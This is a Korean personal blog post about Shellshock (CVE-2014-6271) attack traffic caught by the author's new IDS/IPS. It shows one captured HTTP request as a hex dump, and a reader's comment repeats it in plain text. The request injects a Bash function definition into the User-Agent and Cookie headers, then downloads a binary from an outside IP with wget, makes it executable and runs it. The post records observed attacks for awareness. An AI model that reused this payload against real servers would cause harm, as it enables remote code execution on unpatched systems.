지돌이의 블로그 입니다!

2014.11.08. 19:24



얼마전에 언제나 제작중인;; 홈페이지 서버 네트워크에 IDS/IPS을 구축했는데

하루에 한번 이상으로 Bash취약점 공격(CVE-2014-6271)이 들어오고 있네요...

아마 무작위 공격 같습니다.

뭐 이 외에도 SIP스캔, SSH 취약점, MySQL/MSSQL서버 취약점 공격이 들어오곤 있습니다.

뭐 그냥 얼마전에 이슈가 되었던 Bash취약점을 이용한 공격이라서 씁니다.

 

공격SourceIP는 미국이고

Dest는 80포트 입니다.

페이로드

 

0000000: 47 45 54 20 2f 63 67 69 2d 6d 6f 64 2f   69 6e 64 65 78 2e 63 67 69 20 48 54 54  GET./cgi-mod/index.cgi.HTT
000001A: 50 2f 31 2e 30 0a 43 6f 6e 6e 65 63 74   69 6f 6e 3a 20 63 6c 6f 73 65 0a 55 73  P/1.0.Connection:.close.Us
0000034: 65 72 2d 41 67 65 6e 74 3a 20 28 29 20   7b 20 3a 3b 20 7d 3b 20 2f 75 73 72 2f  er-Agent:.().{.:;.};./usr/
000004E: 62 69 6e 2f 77 67 65 74 20 2d 4f 20 2f   74 6d 70 2f 62 20 68 74 74 70 3a 2f 2f  bin/wget.-O./tmp/b.http://
0000068: 31 30 34 2e 31 39 32 2e 31 30 33 2e 36   2f 66 6f 6f 6e 2f 71 2f 62 3b 20 2f 62  104.192.103.6/foon/q/b;./b
0000082: 69 6e 2f 63 68 6d 6f 64 20 37 37 37 20   2f 74 6d 70 2f 62 3b 20 2f 74 6d 70 2f  in/chmod.777./tmp/b;./tmp/
000009C: 62 3b 0a 43 6f 6f 6b 69 65 3a 20 28 29   20 7b 20 3a 3b 20 7d 3b 20 2f 75 73 72  b;.Cookie:.().{.:;.};./usr
00000B6: 2f 62 69 6e 2f 77 67 65 74 20 2d 4f 20   2f 74 6d 70 2f 62 20 68 74 74 70 3a 2f  /bin/wget.-O./tmp/b.http:/
00000D0: 2f 31 30 34 2e 31 39 32 2e 31 30 33 2e   36 2f 66 6f 6f 6e 2f 71 2f 62 3b 20 2f  /104.192.103.6/foon/q/b;./
00000EA: 62 69 6e 2f 63 68 6d 6f 64 20 37 37 37   20 2f 74 6d 70 2f 62 3b 20 2f 74 6d 70  bin/chmod.777./tmp/b;./tmp
0000104: 2f 62 3b 0a 0a                                                                   /b;..

 

참고로 국내에서 저 IP로 접속이 되지 않습니다. ISP? 정부? 에서 막아 논것 같네요~

심심해서 해외VPN을 이용해 접속해 보니 저 IP로 접속은 되는데 저 파일 URL으로는 접속이 되지 않습니다.

404오류가 나네요. 한번 분석해 보고 싶었는데(물론 깊게 할 능력이 안되지만...ㅋ) 아쉽습니다.

Comment +1

  • CODE 2015.12.22 13:17

    코드를 개떡같이 올려놓셨네요
    #GET /cgi-mod/index.cgi HTTP/1.0
    Connection: close
    User-Agent: () { :; }; /usr/bin/wget -O /tmp/b http://104.192.103.6/foon/q/b; /bin/chmod 777 /tmp/b; /tmp/b;
    Cookie: () { :; }; /usr/bin/wget -O /tmp/b http://104.192.103.6/foon/q/b; /bin/chmod 777 /tmp/b; /tmp/b;

    이렇게 하셔야죠